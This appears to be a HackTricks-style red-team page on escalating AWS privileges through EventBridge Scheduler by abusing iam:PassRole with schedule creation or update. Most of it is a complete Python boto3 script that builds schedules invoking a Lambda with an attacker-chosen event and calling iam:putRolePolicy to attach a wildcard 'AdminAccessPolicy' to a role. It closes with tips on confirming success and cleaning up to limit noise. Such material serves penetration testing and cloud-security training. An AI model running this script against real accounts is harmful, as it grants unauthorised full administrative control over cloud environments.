AWS - EventBridge Scheduler Privesc
Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
EventBridge Scheduler
More info about EventBridge Scheduler in:
AWS - EventBridge Scheduler Enum
iam:PassRole, (scheduler:CreateSchedule | scheduler:UpdateSchedule)
An attacker with those permissions will be able to create or update a schedule and abuse the permissions of the role attached to it to perform any action that role allows: the role is passed with iam:PassRole and is assumed by EventBridge Scheduler every time the schedule fires, so the target runs with that role's permissions, not the attacker's. The passed role must have a trust policy that allows scheduler.amazonaws.com to assume it, and UpdateSchedule replaces the whole schedule definition, so the schedule expression, flexible time window and target all have to be supplied again when an existing schedule is repurposed.
For example, they could configure the schedule to invoke a Lambda function, which is a templated target, passing an arbitrary JSON payload as the invocation event.
In addition to templated targets, universal targets let EventBridge Scheduler call almost any AWS API operation, using a target ARN of the form arn:aws:scheduler:::aws-sdk:service:apiAction (service in lowercase, action in camelCase) and the API parameters JSON-encoded in the target's Input. One example is a universal target for iam:putRolePolicy that attaches an inline "AdminAccessPolicy" to a role, which works whenever the scheduler role has the "PutRolePolicy" permission.
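As an added example (not code from the original page), the following Python builds the two target definitions described above, a templated Lambda target and a universal target for iam:putRolePolicy, wraps each in a complete CreateSchedule/UpdateSchedule request and can submit it with boto3. The account ID, region, role ARN, function ARN, schedule name and policy name are placeholders; the scheduler role is assumed to trust scheduler.amazonaws.com and to hold lambda:InvokeFunction or iam:PutRolePolicy respectively. boto3 is imported only inside submit(), so the request builders run without the SDK installed.

```python
import json

# Placeholder identifiers (assumptions, not taken from the page).
ACCOUNT_ID = "123456789012"
REGION = "us-east-1"
# Role passed with iam:PassRole; EventBridge Scheduler assumes it when the schedule fires,
# so its permissions are the ones that get abused. It must trust scheduler.amazonaws.com.
SCHEDULER_ROLE_ARN = f"arn:aws:iam::{ACCOUNT_ID}:role/scheduler-role"

# Inline policy granting everything; attached through iam:PutRolePolicy.
ADMIN_POLICY = {
    "Version": "2012-10-17",
    "Statement": [{"Effect": "Allow", "Action": "*", "Resource": "*"}],
}


def lambda_target(function_arn: str, event: dict) -> dict:
    """Templated target: the scheduler invokes the Lambda with `event` as the payload.
    The scheduler role needs lambda:InvokeFunction on the function."""
    return {
        "Arn": function_arn,
        "RoleArn": SCHEDULER_ROLE_ARN,
        "Input": json.dumps(event),
    }


def universal_target(service: str, action: str, params: dict) -> dict:
    """Universal target: Arn is arn:aws:scheduler:::aws-sdk:<service>:<apiAction>,
    Input is the JSON-encoded API parameters (PascalCase names, as in the service API)."""
    if not action or not action[0].islower():
        # The apiAction segment is camelCase (putRolePolicy), not the IAM action name (PutRolePolicy).
        raise ValueError("apiAction must be camelCase, e.g. putRolePolicy")
    return {
        "Arn": f"arn:aws:scheduler:::aws-sdk:{service.lower()}:{action}",
        "RoleArn": SCHEDULER_ROLE_ARN,
        "Input": json.dumps(params),
    }


def put_role_policy_target(role_name: str, policy_name: str = "AdminAccessPolicy") -> dict:
    """Universal target for iam:PutRolePolicy that attaches ADMIN_POLICY inline to `role_name`.
    PolicyDocument is itself a JSON string inside the Input JSON, so it is encoded twice."""
    return universal_target("iam", "putRolePolicy", {
        "RoleName": role_name,
        "PolicyName": policy_name,
        "PolicyDocument": json.dumps(ADMIN_POLICY),
    })


def schedule_request(name: str, target: dict, expression: str = "rate(1 minute)") -> dict:
    """Complete CreateSchedule/UpdateSchedule request. FlexibleTimeWindow is mandatory, and
    UpdateSchedule overwrites the whole schedule, so every field is always sent."""
    return {
        "Name": name,
        "ScheduleExpression": expression,
        "FlexibleTimeWindow": {"Mode": "OFF"},
        "Target": target,
    }


def decode_input(target: dict) -> dict:
    """Decode a target's Input back into the API parameters, to check the encoding."""
    return json.loads(target["Input"])


def submit(request: dict, update: bool = False) -> str:
    """Create (or update) the schedule with boto3 and return its ARN.
    Assumes boto3 is installed and the caller holds iam:PassRole plus
    scheduler:CreateSchedule or scheduler:UpdateSchedule."""
    import boto3  # lazy import so the builders above work without the SDK
    client = boto3.client("scheduler", region_name=REGION)
    if update:
        resp = client.update_schedule(**request)
    else:
        resp = client.create_schedule(**request)
    return resp["ScheduleArn"]


if __name__ == "__main__":
    # Escalate the scheduler role itself to admin via a universal target.
    req = schedule_request("privesc-sched", put_role_policy_target("scheduler-role"))
    print(json.dumps(req, indent=2))
    # Equivalent templated target: run a Lambda the role may invoke with a chosen event.
    fn_arn = f"arn:aws:lambda:{REGION}:{ACCOUNT_ID}:function:target-function"
    print(json.dumps(schedule_request("lambda-sched", lambda_target(fn_arn, {"cmd": "id"})), indent=2))
    # submit(req)                 # create the schedule
    # submit(req, update=True)    # or overwrite an existing one with the same name
```

Once the schedule has fired (within a minute for rate(1 minute)), the inline policy is visible with iam get-role-policy on the named role, and the schedule should be deleted or re-pointed to a harmless target to limit noise.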